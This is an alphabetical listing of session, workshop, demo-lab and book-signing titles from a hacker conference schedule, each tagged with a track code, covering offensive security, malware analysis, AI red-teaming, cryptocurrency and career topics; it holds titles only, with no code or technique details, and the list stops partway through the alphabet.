Active Directory Attacks for Red and Blue Teams - Advanced Edition - TRN
Advanced Active Directory to Entra ID lateral movement techniques - DCT
Advanced Cloud Incident Response in Azure and Microsoft 365 - TRN
Advanced Cloud Incident Response in Azure and Microsoft 365 - TRN
Advanced Ghidra Scripting & Automation - DCW
Adversarial mindset, thinking like an attacker is no longer optional - ADV
Adversarial Thinking: The Art of Dangerous Ideas - TRN
Adversarial Thinking: The Art of Dangerous Ideas - TRN
Adversaries at War: Tactics, technologies, and lessons from modern battlefields - ADV
Adversary Intel Lab: Build Your First Threat Emulation Plan - RTV
AI SecureOps: Attacking & Defending AI Applications and Services - TRN
AI SecureOps: Attacking & Defending AI Applications and Services - TRN
AI-Powered Web Applications: A New Era in Security – Live Technical Demo - RTV
AIMaL - Artificially Intelligent Malware Launcher - DL
AIMaL - Artificially Intelligent Malware Launcher - DL
AIMaL: Artificially Intelligent Malware Launcher - RTV
AirBleed - Covert Bluetooth Plist Payload Injection - DL
AirBleed - Covert Bluetooth Plist Payload Injection - DL
Airport Security! - S01 E008 - Breaking into your baggage - PSV
All your keyboards are belong to us! - HHV
Amber64: Mining Hacker History from Over Half a Million Commodore 64 Disks - DCT
AML Cryptocurrency Compliance - CRE
Analyzing and Creating Windows Shellcode for Hackers - DCW
Angry Magpie - DLP Bypass Simulator - DL
Angry Magpie - DLP Bypass Simulator - DL
Anotomy of Telecom Malware - TELV
AppleStorm - Unmasking the Privacy Risks of Apple Intelligence - DCT
Applied Cryptocurrency Hardware - CRE
Ask a Hiring Manager with Cory Wolff - RTV
Ask a Hiring Manager with Peter Hefley - RTV
Ask a Hiring Manager with Troy Fridley - RTV
Ask EFF - DCT
Assessing the Capabilities Gap Between Foundation Models and Cybersecurity Experts: Benchmarks, Safeguards, and Policy - AIV
Attack and Defend Software Supply Chain - TRN
Attack and Defend Software Supply Chain - TRN
Attack Flow and Root Cause Discovery - No LLMs, No Queries, Just Explainable ML - DL
Attack Flow and Root Cause Discovery - No LLMs, No Queries, Just Explainable ML - DL
Attacking & Securing CI/CD Pipeline Certification (ASCPC) by White Knight Labs - TRN
Attacking & Securing CI/CD Pipeline Certification (ASCPC) by White Knight Labs - TRN
Attacking AI - BBV
Attacking Kubernetes: Tools and Tactics to Compromise Your First Cluster - RTV
Azure Cloud Attacks for Red & Blue Teams - Beginner Edition - TRN
Azure Cloud Attacks for Red & Blue Teams - Beginner Edition - TRN
Back to Basics: Building Resilient Cyber Defenses - CPV
Badgelife: Lessons from Years of Do’s, Don’ts, and Last-Minute Saves - CRE
Bare Metal Reverse Engineering - BHV
Beaconator C2 Framework - DL
Beaconator C2 Framework - DL
Becoming a Caido Power User - BBV
Beginner's Guide to Attacks and Defenses - TRN
Beginner's Guide to Attacks and Defenses - TRN
Beginner's Guide to Attacks and Defenses - TRN
Beginner's Guide to Attacks and Defenses - TRN
Behind the Badge: How We Used and Abused Hardware (again) to Create the AV Badge for DC33 - ASV
Behind The Dashboard - (Lack Of) Automotive Privacy - CPV
Beyond the Stack: How External Failures Impact Payments Security - PAYV
Binary exploitation basics - MWV
Binary Facades: Reversing approaches to extract embedded scripts in compiled macOS malware - DCT
Bio-Cryptography is the Game-Genie in a post quantum dystopia - BHV
BitUnlocker: Leveraging Windows Recovery to Extract BitLocker Secrets - DCT
Blackdagger - Cyber Workflow Automation Framework - DL
Blackdagger - Cyber Workflow Automation Framework - DL
Blind Trailer Shouting - CHV
Blind Trailer Shouting - DCT
BloodHound Enterprise CTF - RTV
Blurred Lines of Cyber Threat Attribution: The Evolving Tactics of North Korean Cyber Threat Actors - ADV
BOAZ - A Multilayered Approach to AV/EDR Evasion Engineering - DL
BOAZ - A Multilayered Approach to AV/EDR Evasion Engineering - DL
Book Signing - Adversary Emulation with MITRE ATT&CK - Drinor Selmanaj - MISC
Book Signing - Adversary Emulation with MITRE ATT&CK - Drinor Selmanaj - MISC
Book Signing - Alex Matrosov/No Starch Press - MISC
Book Signing - Alfie Champion/No Starch Press - MISC
Book Signing - Breaking IN: A Practical Guide To Starting a Career In Information Security Cybersecurity Essentials For Startups : A Practical Guide - Ayman Elsawah - MISC
Book Signing - Breaking IN: A Practical Guide To Starting a Career In Information Security Cybersecurity Essentials For Startups : A Practical Guide - Ayman Elsawah - MISC
Book Signing - Casey Edman/No Starch Press - MISC
Book Signing - Corey Ball/No Starch Press - MISC
Book Signing - Cyber Calendar 2026 - Chris DeCarmen/Squared Away LLC - MISC
Book Signing - Cyber Calendar 2026 - Chris DeCarmen/Squared Away LLC - MISC
Book Signing - Cyber Calendar 2026 - Chris DeCarmen/Squared Away LLC - MISC
Book Signing - Daniel Reilly/No Starch Press - MISC
Book Signing - Eugene Lim/ No Starch Press - MISC
Book Signing - Firewalls Don't Stop Dragons: A Step-by-Step Guide to Computer Security and Privacy for Non-Techies (5th ed) - Carey Parker - MISC
Book Signing - Fotis Chantizis/ No Starch Press - MISC
Book Signing - Future of Hacking: The Rise of Cybercrime and the Fight to Keep Us Safe - Laura S. Scherling, EdD / Bloomsbury - MISC
Book Signing - Future of Hacking: The Rise of Cybercrime and the Fight to Keep Us Safe - Laura S. Scherling, EdD / Bloomsbury - MISC
Book Signing - Ghost Hacker : How to hack human spirit - Jun Kawasaki - MISC
Book Signing - Jason Andress/ No Starch Press - MISC
Book Signing - Jon DiMaggio/ No Starch Press - MISC
Book Signing - JP Ausmasson/No Starch Press - MISC
Book Signing - Kara Nance/No Starch Press - MISC
Book Signing - Kyle Cucci/No Starch Press - MISC
Book Signing - Micah Lee/ No Starch Press - MISC
Book Signing - Nick Aleks/No Starch Press - MISC
Book Signing - Patrick Wardle/ No Starch Press - MISC
Book Signing - Paulino Calderon/No Starch Press - MISC
Book Signing - Philip Dunsey/No Starch Press - MISC
Book Signing - Practical Lock Picking; Keys to the Kingdom - Deviant Ollam/Red Team Tools - MISC
Book Signing - Supply Chain Software Security-AI, IoT and Application Security - Aamiruddin Syed/Apres Media LLC - MISC
Book Signing - The Browser Security Field Manual Adeline - Audrey Adeline - MISC
Book Signing - The Hacker Mindset: A 5-Step Methodology for Cracking the System and Achieving Your Dreams - Garrett Gee/Hacker Warehouse - MISC
Book Signing - The Hacker Mindset: A 5-Step Methodology for Cracking the System and Achieving Your Dreams - Garrett Gee/Hacker Warehouse - MISC
Book Signing - Travis Goodspeed/No Starch Press - MISC
Brazil's aPIXcalypse - How real time payments turned Brazilian threat scenario into a nightmare - PAYV
Break Systems, Not Promises: I promised to do a keynote at DEF CON - MWV
Breakin 'Em All – Overcoming Pokemon Go's Anti-Cheat Mechanism - DCT
Breaking In: Real Paths Into Cybersecurity from Hackers, Humans, and Hiring Pros - CRE
Breaking the Chain: Advanced Offensive Strategies in the Software Supply Chain - BBV
Breaking Wi-Fi Easy Connect: A Security Analysis of DPP - DCT
Bridge to Nowhere Good: When Azure Relay becomes a Red Teamer's highway - RTV
BRIDGING THE GAP - An Introduction to IoT Security from Serial to Bluetooth - TRN
BRIDGING THE GAP - An Introduction to IoT Security from Serial to Bluetooth - TRN
Browser Extension Clickjacking: One Click and Your Credit Card Is Stolen - DCT
BT hacking - PAYV
Bug Bounty Village Closing Ceremony - BBV
Bug Bounty Village CTF Awards - BBV
Bug Bounty Village CTF Walkthrough - BBV
Building a Malware Museum - DCT
Building Your First Windows Malware Loader - RTV
Burning, trashing, spacecraft crashing: a collection of vulnerabilities that will end your space mission - ASV
C4 - Cross Compatible Command and Control - DL
C4 - Cross Compatible Command and Control - DL
Caldera for OT - Oops! All Software - DL
Caldera for OT - Oops! All Software - DL
Can't Stop the ROP: Automating Universal ASLR Bypasses for Windows - DCT
Card testing workshop - PAYV
Card testing workshop - PAYV
Carding is Dead, Long Live Carding: How MaaS is fueling NFC relay attacks - PAYV
Carding, Sabotage & Survival: A Darknet Market Veteran’s Story - DCT
Career Fair: Interview Tips and Referral - CRE
Career Fair: Resume Review - CRE
Cash, Drugs, and Guns: Why Your Safes Aren't Safe - DCT
Cheat Code for Hacking on T-Mobile: From Inside the TMO BBP Perspective - BBV
China's Health Sector Ambitions and Information Needs: Implications for U.S. Health Care Cyber Defense - PLV
ChromeAlone: Transforming a Browser into a C2 Platform - DCT
Claude--Climbing a CTF Scoreboard Near You - DCT
ClickFix: The Malware Delivery Technique Enabling Ransomware Affiliates and State-Sponsored APT Operations - MWV
Client or Server? The Hidden Sword of Damocles in Kafka - DCT
Cloud Forensics Workshop: Smart Grid Edition - DCW
Compromising Threat Actor Communications - MWV
Context Aware Anomaly Detection in Automotive CAN Without Decoding - CHV
Contextualizing alerts & logs at scale without queries or LLMs (opensource) - IOTV
Contextualizing alerts with relevant logs and events without queries or LLMs - DCW
Copycat - Identity Stealer Extension - DL
Copycat - Identity Stealer Extension - DL
Countering Forensics Software by Baiting Them - ADV
Cracking Chaos: Making, Using, and Breaking PRNGs - CPV
Creating an AI Agent to Hack a Web Application - RTV
Creating Integrated Threat Surveillance: AI + OSINT + Security Onion - CRE
Creating malicious functional app on Android - DCW
Creator Panel Discussion - BBV
Critically Neglected: Cybersecurity for buildings - ICSV
Crossing the Line: Advanced Techniques to Breach the OT DMZ - ICSV
Crypto Privacy Village: Closing Remarks - CPV
Crypto Privacy Village: Welcome - CPV
Crypto Privacy Village: Welcome - CPV
Crypto Privacy Village: Welcome - CPV
Cryptocurrency Enforcement Actions - CRE
Cryptocurrency Nodes and Relays - CRE
Cryptocurrency Opening Keynote - CRE
Cryptocurrency Weekend Keynote - CRE
Cryptography is hard: Breaking the DoNex ransomware - MWV
Cryptosploit - DL
Cryptosploit - DL
CTRAPS: CTAP Impersonation and API Confusion Attacks on FIDO2 - DCT
Cyber Volunteering and Community Defense - DEF CON Franklin and the Cyber Resilience Corps 1 Year In - DCT
Cybersecurity in Latin America: The Untold Stories of Resilience & Innovation - PGE
Dark Capabilities: When Tech Companies Become Threat Actors - PLV
DDoS: The Next Generation - CRE
De-Virtualizing the Dragon: Automated Unpacking and Deobfuscation of Nested VM-Based Protectors using Symbolic Execution and Taint Tracking - DCT
Dead Made Alive Again: Bypassing Intent Destination Checks and Reintroducing LaunchAnyWhere Privilege Escalation - DCT
Dead Reckoning: Hijacking Marine Autopilots - MHV
Deconstructing Malware Lineage with Graph Neural Networks - MWV
Deep Dive into Fuzzing - TRN
Deep Dive into Fuzzing - TRN
Deep-dive into modern network fingerprinting - DCW
Deepfake Image and Video Detection   - PHV
DEF CON Closing Ceremonies & Awards - DCT
DEF CON Groups (DCGs): Keeping the Signal Alive All Year Long - DCG
Defeating Malware Evasion: Techniques and Countermeasures - DCW
Deploying Deception in Depth for ICS - ICSV
Diamonds Are For Hackers - Building the first fully open source and hackable Quantum Sensor - DCT
Digital Casualties: Documenting Cyber-Induced Patient Harm in Modern Healthcare - BHV
Digital First Responders: Fixing Patient Safety Gaps with Smart Tech & AI - BHV
Direct Memory, Access Everywhere - DCT
DisguiseDelimit: Exploiting Synology NAS with Delimiters and Novel Tricks - DCT
Disrupting Digital Dataflows: A 101 on how 2 detect, analyze, & disrupt digital systems by reverse engineering real-world Electronic Warfare techniques from Ukraine at the hardware level - DCW
Dive into Windows Library Loading - DCW
DIY Malware Emulation: Build It, Break It, Detect It - DCW
DNS-Based OSINT Tactics for Product and Service Discovery - RTV
Do Scammers dream of electric Phish? Lessons learned from deploying AI-driven phishing ops - SEV
Dodging the EDR bullet: A Training on Malware Stealth Tactics - TRN
Dodging the EDR bullet: A Training on Malware Stealth Tactics - TRN
Domain Fronting in 2025: a retro analysis - MWV
Don the Mantle: Red Team Campaign Planning and Execution with MITRE ATT&CK - RTV
Don't be LLaMe - The basics of attacking LLMs in your Red Team exercises - RTV
Don’t Cry Wolf: Evidence-based assessments of ICS Threats - ICSV
DVBE - Damn Vulnerable Browser Extension - DL
DVBE - Damn Vulnerable Browser Extension - DL
Dyna - Automating the OWASP MASTG with Offensive Android Tactics - DL
Dyna - Automating the OWASP MASTG with Offensive Android Tactics - DL
Edge of Tomorrow: Foiling Large Supply Chain Attacks By Taking 5k Abandoned S3 Buckets from Malware and Benign Software - DCT
EduQ: A DIY Self-Education Platform for Hackers to Break, Build, and Experiment with Quantum-Secured Networks - QTV
Effectively Detecting Modern Malware with Volatility 3 - DCW
Elevators 101 - PSV
Eliminating Bug Classes at Scale: Leveraging Browser Features for Proactive Defense - DCW
EMMC BGA Secrets, hack bga memory, no reballing necessary: Learn how to safely remove EMMC memory modules, hack them and then reinstall, without the difficult process of trying to reball the BGA. - DCW
Empire 6.0 - DL
Empire 6.0 - DL
Emulating Embedded Linux Devices at Scale with Light-Touch Firmware Rehosting - DCT
EncryptedClientHelloWorld: TLSv1.3 ECH As A Covert C2 Channel - RTV
Enshittification: It's Over 9000 - MWV
EntraGoat - A Deliberately Vulnerable Entra ID Environment - DL
EntraGoat - A Deliberately Vulnerable Entra ID Environment - DL
Escaping the Privacy Sandbox with Client-Side Deanonymization Attacks - DCT
Escaping the Privacy Sandbox with Client-Side Deanonymization Attacks - CPV
Everyday Ghidra: Practical Windows Reverse Engineering - TRN
Everyday Ghidra: Practical Windows Reverse Engineering - TRN
Evolution and History of Drain and Approval Attacks - CRE
Exploiting the Off-chain ecosystem in Web 3 Bug Bounty - BBV
Exposing Infosec Frauds and Foreign Agents Behind Mercenary Spyware Disinformation - MWV
Exposing Infosec Frauds and Foreign Agents Behind Mercenary Spyware Disinformation - MWV
Fear vs. Physics: Diagnosing Grid Chaos - ICSV
Fighting the Digital Blockade: A View from Taiwan - MHV
Fine Tune your personal LLM assistant to Secure coding - DCW
Fingerprinting Maritime NMEA2000 Networks - MHV
Firewalls Under Fire: China's 5+ year campaign to penetrate perimeter network defenses - DCT
Firmware Decryption: For, and By, the Cryptographically Illiterate - IOTV
FLARE-VM - DL
FLARE-VM - DL
Flipping Locks - Remote Badge Cloning with the Flipper Zero and More - PSV
Fortifying AI: Hands-On Training in Adversarial Attacks and Defense of AI Systems - DCW
Frida for reverse engineering payment applications - PAYV
From adversarial to aligned, redefining purple teaming for maximum impact - ADV
From Component to Compromised: XSS via React createElement - BBV
From Prey to Playbook: Learning about victim behavior from infostealer logs - RTV
From Prompt to Protection: A Practical Guide to Building and Securing Generative AI Applications - DCW
From Pwn to Plan: Turning Physical Exploits Into Upgrades - PSV
From Shanghai to the Shore: The Silent Threat in Global Shipping - DCT
From Spoofing to Tunneling: New Red Team's Networking Techniques for Initial Access and Evasion - DCT
From USB to C2 - RTV
Full Disclosure, Full Color: Badge-making story of this year's BBV badge - BBV
Full-Stack Pentesting Laboratory: 100% Hands-On + Lifetime LAB Access - TRN
Full-Stack Pentesting Laboratory: 100% Hands-On + Lifetime LAB Access - TRN
Game Hacking 101 - GHV
Garuda Threat Hunting Framework - DL
Garuda Threat Hunting Framework - DL
Gateways to Chaos - How We Proved Modems Are a Ticking Time Bomb That Hackers Can Access Everywhere - DCT
GenAI red teaming for Payment Fraud - PAYV
Getting Caught in Offensive Security - RTV
Getting started in Malware Analysis with Ghidra - MWV
Ghost Calls: Abusing Web Conferencing for Covert Command & Control - DCT
Ghosts in the Machine Check - Conjuring Hardware Failures for Cross-ring Privilege Escalation - DCT
Ghosts of REvil: An Inside Look with the Hacker Behind the Kaseya Ransomware Attack - DCT
GlytchC2 - Command Execution and Data Exfiltration of Any Kind Through Live Streaming Platforms - DL
GlytchC2 - Command Execution and Data Exfiltration of Any Kind Through Live Streaming Platforms - DL
GlytchC2: Command execution and data exfiltration of any kind through live streaming platforms - RTV
Go Hack Yourself: API Hacking for Beginners - RTV
Go Malware Meets IoT: Challenges, Blind Spots, and Botnets - IOTV
Grandoreiro & friends: brazilian banking trojans tour outside Latin America - MWV
Grind vs Gleam: Building Reddit's DDoS Resilience - CRE
Growing Red Team Village: What We’ve Learned Building an Offensive Security Community - RTV
Hack the Clock: Automating CVE Exploit searches to save time, money, and not get bored. - RTV
Hack the Connected Plant! - TRN
Hack the Connected Plant! - TRN
Hacker Troll House - RTV
Hacker VPN - DCW
Hacker vs. Triage: Inside the Bug Bounty Battleground - BBV
Hackers Dropping Mid-Heist Selfies: LLM Identifies Information Stealer Infection Vector and Extracts IoCs - DCT
Hacking a head unit with malicious PNG - CHV
Hacking at Scale with AI Agents: Building an Autonomous Bug Bounty Hunter - BBV
Hacking Context for Auto Root Cause and Attack Flow Discovery - PHV
Hacking Cryptography: Attacks, Tools, and Techniques - TRN
Hacking Cryptography: Attacks, Tools, and Techniques - TRN
Hacking Custody and Exchanges - CRE
Hacking Hotel Locks; The Saflok Vulnerabilities Expanded - PSV
Hacking Hotspots: Pre-Auth Remote Code Execution, Arbitrary SMS & Adjacent Attacks on 5G and 4G/LTE Routers - DCT
Hacking Modern Web Apps: Master the Future of Attack Vectors - TRN
Hacking Modern Web Apps: Master the Future of Attack Vectors - TRN
Hacking Space to Defend It: Generating IoBs with SPARTA - ASV
Hacking the connected plant: AI edition! - DCW
Hacking the Edge: Real-World ESI Injection Exploits - BBV
Hacking the First Amendment: A press photographer's perspective on Red Teaming scenarios - SEV
Hacking the Graph: Advanced Target Discovery with OWASP Amass - BBV
Hacking The Metal: Into the GPU - DCW
Hacking the Nautical Rules of the Road: Turn Left for Global Pwnage - MHV
HaKCing OBD-II Emissions Testing - DCT
Hands-on Car Hacking & Automotive Cybersecurity - TRN
Hands-on Car Hacking & Automotive Cybersecurity - TRN
Hands-on IoT firmware extraction and flash forensics - DCW
Hands-on Kubernetes Attack & Defense Masterclass - DCW
Hands-On Threat Hunting with Wireshark - DCW
Hard Hat Brigade Creations Q&A -
Hard Hat Brigade Organizer Panel -
Harnessing LLMs for Application Security - TRN
Harnessing LLMs for Application Security - TRN
Have I Been Ransomed? - DL
Have I Been Ransomed? - DL
Help! Linux in my Webcam! (•_•) - DCT
Here and Now: Exploiting the Human Layer at the Right Moment - ADV
How AI + Hardware can Transforming Point-of-Care Workflows - BHV
How API flaws led to admin access to over 1,000 USA dealers and control over your car - CHV
How Computers Kill People: Marine Systems - MHV
How Not to IoT: Lessons in Security Failures - ESV
How NOT to Perform Covert Entry Assessments by WeHackPeople.com - PSV
How to Fake a Badge like a Pro: 11 Tips to Counterfeiting Event Credentials - DCT
How to secure unique ecosystem shipping 1 billion+ cores? - DCT
HTTP/1.1 Must Die! The Desync Endgame - DCT
Hull Integrity: Applying MOSAICS to Naval Mission Systems - ICSV
Hunting for Hackers by Deloitte - TRN
Hunting for Hackers by Deloitte - TRN
Hybrid Attack - RTV
I Can't RE (and You Can Too!) - MWV
Illuminating the Dark Corners of AI: Extracting Private Data from AI Models and Vector Embeddings - CPV
Impact of Frontier AI on the Landscape of Cybersecurity - AIV
Infecting the Boot to Own the Kernel: Bootkits and Rootkits Development - DCT
Influence Operations: Tactics, Defense, and Exploitation - TRN
Influence Operations: Tactics, Defense, and Exploitation - TRN
Initial Access Tactics on MacOS - RTV
Inside Look at a Chinese Operational Relay Network - DCT
Inside the Threat: Designing and Deploying Malicious Browser Extensions to Understand Their Risk - DCW
Instant API Hacker! - RTV
Intro to Ciphers [Mini Workshop/Talk] - CPV
Intro to Common Industrial Protocol Exploitation - ICSV
Intro to Physical Security Bypass - PSV
Intro to village - PAYV
Intro to village - PAYV
​​Introducing CIPHER: The Open-Source Platform Revealing Patient Harms from Healthcare Cyberattacks - BHV
Introduction of Loong Community & Financial Identity crime (deepfake) regulation of diferetn jurisdictions - CRE
Introduction to Cryptographic Attacks - DCW
Introduction to Operationalizing & Using C2 (w/ some AI) - RTV
Invitation Is All You Need! Invoking Gemini for Workspace Agents with a Simple Google Calendar Invite - DCT
Jailbreaking the Hivemind: Finding and Exploiting Kernel Vulnerabilities in the eBPF Subsystem - DCT
Journey to the center of the PSTN: How I became a phone company, and why you should too. - DCT
K8sploitation: Hacking Kubernetes the Fun Way - DCW
KeePass, weaponized - MWV
Kill Chain Reloaded: Abusing legacy paths for stealth persistence - DCT
Kill List: Hacking an Assassination Site on the Dark Web - DCT
Killing Killnet - DCT
Learning to Hack Bluetooth Low Energy with BLE CTF - DCW
Legalizing Ethical Hacking: A Global Safe Harbor for Security Research - PLV
Let's Break Enigma! - CRE
Letthemin: Facilitating High-Value Purple Teams Using an Assumed Compromise Approach - ADV
Level UP OSINT - RTV
Leveraging AI and MCP Servers for Automated External Attack Surface Testing - RTV
Lex Sleuther - DL
Lex Sleuther - DL
Loading Models, Launching Shells: Abusing AI File Formats for Code Execution - DCT
Locked Down, Not Locked Out: How I Escaped Your Secure Operator Workstation - ICSV
Loudmouth Security - Offensive IoT Exploitation - TRN
Loudmouth Security - Offensive IoT Exploitation - TRN
Mac Malware Analysis - MWV
Magical Hacks - BBV
Making Dirty Pictures - The Issue with DICOM - MWV
Malware and Monsters - MWV
Malware Exploitation in PDFs: A Red Team Perspective - RTV
Malware in the gist: How malicious packages on npm bypass existing security tools - ADV
Malware Matryoshka: Nested Obfuscation Techniques - MWV
Man-in-the-Malware: Intercepting Adversarial Communications - DCT
Mastering Apple's Endpoint Security for Advanced macOS Malware Detection - DCT
Medical Device Hacking: 201 - DCW
Messenger - Proxies Here There and Everywhere - DL
Messenger - Proxies Here There and Everywhere - DL
Metal-as-a-Disservice: Exploiting Legacy Flaws in Cutting-Edge Clouds - DCT
Metasploit's Latest Attack Capability and Workflow Improvements - DL
Metasploit's Latest Attack Capability and Workflow Improvements - DL
Metasploit's Latest Attack Capability and Workflow Improvements - DL
MFT2: More Fungible Threats - DDV
MFT2: More Fungible Threats - DDV
Mind the Data Voids: Hijacking Copilot Trust to Deliver C2 Instructions with Microsoft Authority - DCT
Mind vs. Machine: Finding the Sweet Spot in Modern Red Teaming - RTV
Modern Odometer Manipulation - CHV
ModuleOverride – Changing a Tyre Whilst Driving - RTV
Moonlight Defender - Purple Teaming in Space! - ASV
MPIT - Matrix Prompt Injection Tool and ShinoLLMApps - DL
MPIT - Matrix Prompt Injection Tool and ShinoLLMApps - DL
Mythic, Ghostwriter, Nemesis, and Tying the Room Together: The Dude's Guide to Red Team Operations - RTV
Navigating the Invisible - MHV
Nebula - 4 Years and Still Kicking *aaS - DL
Nebula - 4 Years and Still Kicking *aaS - DL
Network tokens - PAYV
Never enough about cameras - The firmware encryption keys hidden under the rug - IOTV
No Brain No Gain - IOTV
No VPN Needed? Cryptographic Attacks Against the OPC UA Protocol - DCT
NO-HAVOC today, NO-HAVOC tomorrow - MWV
North Korea's Fur Shop: Poaching for Otters, Beavers, Ferrets and Capybaras - MWV
Not Just a Pipeline Leak: Reconstructing the Real Attack Behind tj-actions - DCT
nRootTag - Exploiting Find My and Transforming Computers Into Unauthorized Trackers - DL
nRootTag - Exploiting Find My and Transforming Computers Into Unauthorized Trackers - DL
Nuclei: Beyond The Basic Templates - BBV
Nuclei: Beyond The Basic Templates - BBV
OAuthSeeker - DL
OAuthSeeker - DL
Obfuscation Reloaded: Modern Techniques for Evading Detection - DCW
Oblivious Access to Blockchains - CRE
Of Stochastic Parrots and Deterministic Predators: Decision-Making in Adversarial Automation - ADV
Off-Grid Datarunning in Oppresive Regimes: Sneakernet and Pirate Box - CRE
Offensive Cyber Security Operations: Mastering Breach and Adversarial Attack Simulation Engagements - TRN
Offensive Cyber Security Operations: Mastering Breach and Adversarial Attack Simulation Engagements - TRN
Offensive Development Practitioner Certification (On-Site) by White Knight Labs - TRN
Offensive Development Practitioner Certification (On-Site) by White Knight Labs - TRN
Old Tactics, New Weapons: Abusing Modern Software Stacks for Reliable Shell Access - RTV
One Key, Two Key, I Just Stole Your goTenna Key - DCT
One Modem to Brick Them All: Exploiting Vulnerabilities in the EV Charging Communication - CHV
One Modem to Brick Them All: Exploiting Vulnerabilities in the EV Charging Communication - DCT
Open Source Malware 101 - Everything you always wanted to know about npm malware (and more) - DCW
Operation Europa Crisis: A Tabletop Simulation - BHV
Operational Twilight: APTs, OT, and the geopolitics of a dying climate - ADV
Original Sin of SSO: macOS PRT Cookie Theft & Entra ID Persistence via Device Forgery - DCT
Orion - fuzzing workflow automation - DCT
OSINT Challenges - RTV
OSINT for Hackers - RTV
OT Network Segmentation Planning, Implementation, and Validation - ICSV
OverLAPS: Overriding LAPS Logic - DCT
PAPRa - DL
PAPRa - DL
Passing the Torch: Mentoring and Protecting Our Students in Education Spaces - CRE
Passkeys in payments - PAYV
Passkeys Pwned: Turning WebAuthn Against Itself - DCT
PatchLeaks - DL
PatchLeaks - DL
Paywall Optional: Stream for Free with a New Technique, Recursive Request Exploits (RRE) - DCT
Pen-testing Cloud REST APIs - DCW
Pirates of the North Sea - MHV
Planting C4: Cross-Compatible External C2 for All Your Implants - DCT
Platform Panel about Triage - BBV
Playing Dirty Without Cheating - Getting Banned for Fun and No Profit - DCT
PLC Playground: Hands-On Industrial Control Systems Attacks - DCW
Portswigger Awards: Top 10 web hacking techniques of 2024 - BBV
Post-Quantum Panic: When Will the Cracking Begin, and Can We Detect it? - QTV
Practical YARA: Crafting Custom Rules for Targeted Malware Defense - DCW
Private, Private, Private: Access Everywhere - CRE
Prompt. Scan. Exploit: AI’s Journey Through Zero-Days and a Thousand Bugs - BBV
promptmap2 - DL
promptmap2 - DL
Provably exfiltrating data by breaking TLS in the right ways - DCW
Putting EDRs in Their Place: Killing and Silencing EDR Agents - DCW
QC Intro - QTV
QRAMM: The Cryptographic Migration to a Post-Quantum World - CPV
Quantum Pictorialism for Hackers - QTV
Quantum Table Top Threat Modelling - QTV
Quantum-Resistant Healthcare - BHV
Quiet Confidence: An Introvert's Journey to Technical Public Speaking - CRE
Ransomware vs EDR: Inside the Attacker's Mind - RTV
RATs & Socks abusing Google Services - DCT
Rayhunter Internals - CRE
Reach the Nirvana - DCW
Rebadged, Relabeled, and Rooted: Pwnage via the Solar Supply Chain - DCT
Rebuild The World: Access to secure software dependency management everywhere with Nix - CRE
Recording PCAPs from Stingrays With a $20 Hotspot - DCT
Red Alerts and Blue Oceans: Incident Response from a Sysadmin’s War Room in Maritime Ops - MHV
Red Russians: How Russian APT groups closely follow offensive security research - ADV
Red Teaming Financial Defenses - CRE
Red Teaming Kubernetes: From App-Level CVEs to Full Cluster Takeover - RTV
Red Teaming Space: Hacking the Final Frontier - ASV
Redteam Infrastructure Vibez Edition - RTV
Referral Beware, Your Rewards Are Mine - BBV
Remote code execution via MIDI messages - DCT
Resilient and Reconfigurable Maritime Comms. - MHV
RETCON - Reticulum Embedded Turnkey Connection Operating Node - DL
RETCON - Reticulum Embedded Turnkey Connection Operating Node - DL
RETINA - Realtime Electronic Threat and Intrusion Neutralization Apparatus - DL
RETINA - Realtime Electronic Threat and Intrusion Neutralization Apparatus - DL
RETINA - Realtime Electronic Threat and Intrusion Neutralization Apparatus - DL
rev.ng Decompiler - DL
rev.ng Decompiler - DL
ReVault! Compromised by your Secure SoC - DCT
RFID and Electronic Physical Access Control System Hacking - TRN
RFID and Electronic Physical Access Control System Hacking - TRN
Risk and payments across the ecosystem - PAYV
Robin - The Archaeologist of the Dark Web - DL
Robin - The Archaeologist of the Dark Web - DL
Rusty pearls: Postgres RCE on cloud databases - DCT
Safe Harbor or Hostile Waters: Unveiling the Hidden Perils of the TorchScript Engine in PyTorch - DCT
Safeguarding the Industrial Frontier: OT SOC & Incident Response - ICSV
SAMLSmith - DL
SAMLSmith - DL
Satellite Networks Under Siege: Cybersecurity Challenges of Targeted DDoS Attacks - ASV
SCCM: The tree that always bears bad fruits - DCT
Secret Life of an Automationist: Engineering the Hunt - BBV
Secure Code Is Critical Infrastructure: Hacking Policy for the Public Good - PLV
Securing Intelligence: How hackers are breaking modern AI systems … and how bug bounty programs can keep up - BBV
Self Custodial Wallet Use - CRE
Shaking Out Shells with SSHamble - DCT
Silent Leaks: Harvesting Secrets from Shared Linux Environments - DCT
Silent Sabotage: How Nation-State Hackers Turn Human Error into Catastrophic Failures - CRE
Silent Sigma: Unraveling Iranian APT's 0-Day Warfare and Covert C2 - MWV
Silent Signals: Exploiting Security and Privacy Side-Channels in End-to-End Encrypted Messengers - DCT
Simulated Adversary: Tactics & Tools Training - TRN
Simulated Adversary: Tactics & Tools Training - TRN
Siri-ously Leaky: Exploring Overlooked Attack Surfaces Across Apple's Ecosystem - DCT
Smart Bus Smart Hacking: From Free WiFi to Total Control - CHV
Smart Devices, Dumb Resets? Testing Firmware Persistence in Commercial IoT - IOTV
Smashing the Sandbox: Inside DBatLoader's Unique Evasion Techniques - MWV
SnowGoat: Exposing Hidden Security Risks and Leaking Data Like a Threat Actor - DCW
So Long, and Thanks for All the Phish - DCT
SOC 101 - SOC 1 Analyst Bootcamp - TRN
SOC 101 - SOC 1 Analyst Bootcamp - TRN
Social Engineering Community Village Greeting and 2025 Badge Overview - SEV
Software Defined Radios 101 - TRN
Software Defined Radios 101 - TRN
Solving Modern Cybersecurity Problems with AI - TRN
Solving Modern Cybersecurity Problems with AI - TRN
Sometimes you find bugs, sometimes bugs find you - BBV
Spotter - Universal Kubernetes Security Scanner and Policy Enforcer - DL
Spotter - Universal Kubernetes Security Scanner and Policy Enforcer - DL
SSH Honeypots and Walkthrough Workshops: A History - PHV
SSH-nanigans: Busting Open the Mainframes Iron Fortress through Unix - DCT
State of Open Source in the Federal Government - PLV
State of the Pops: Mapping the Digital Waters - MHV
Stealing Browser Cookies: Bypassing the newest Chrome security measures - RTV
Stealing Browser Cookies: Bypassing the newest Chrome security measures - RTV
StealthToken: Exploiting Identity Providers the Serverless Way - RTV
Stories from a Tor dev - DCT
Surfing through the Stream: Advanced HTTP Desync exploitation in the wild - BBV
Surviving the Dataclysm: Resistance through Resilience - CRE
Takes All Kinds: Building Onramps for Emergency Web Archiving in Ukraine and Beyond - PLV
Tales from the NIST AI Pen Test Challenge - AI Pen Testing 101 - RTV
Teaching Your Reverse Proxy to Think: Fingerprint-Based Bot Blocking & Dynamic Deception - PHV
Tengu Marauder v2 - DL
